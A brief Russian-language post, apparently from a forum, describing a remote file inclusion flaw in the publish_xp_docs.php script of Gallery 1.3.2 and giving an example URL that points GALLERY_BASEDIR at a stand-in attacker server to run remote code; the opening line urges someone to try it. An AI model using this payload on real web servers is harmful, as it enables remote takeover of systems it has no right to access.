Уязвимость обнаружена в 1.3.2. И поэтому тебе это врятли поможет но навсякий случай попробуй.
Gallery – система управления изображениями от http://gallery.sourceforge.net.

Gallery v1.3.2 содержит новую особенность, которая позволяет пользователям публиковать изображения Web сайте, используя систему публикации Windows XP Publishing subsystem. Обнаруженная уязвимость в этой особенности (а точнее в сценарии publish_xp_docs.php) позволяет злонамеренному пользователю обработать URL таким образом, что он может получить удаленный доступ к Web серверу с привилегиями Web сервера.

Пример:

http://hostname/gallery/publish_xp_docs.php?
GALLERY_BASEDIR=http://your.evil.server.tdl/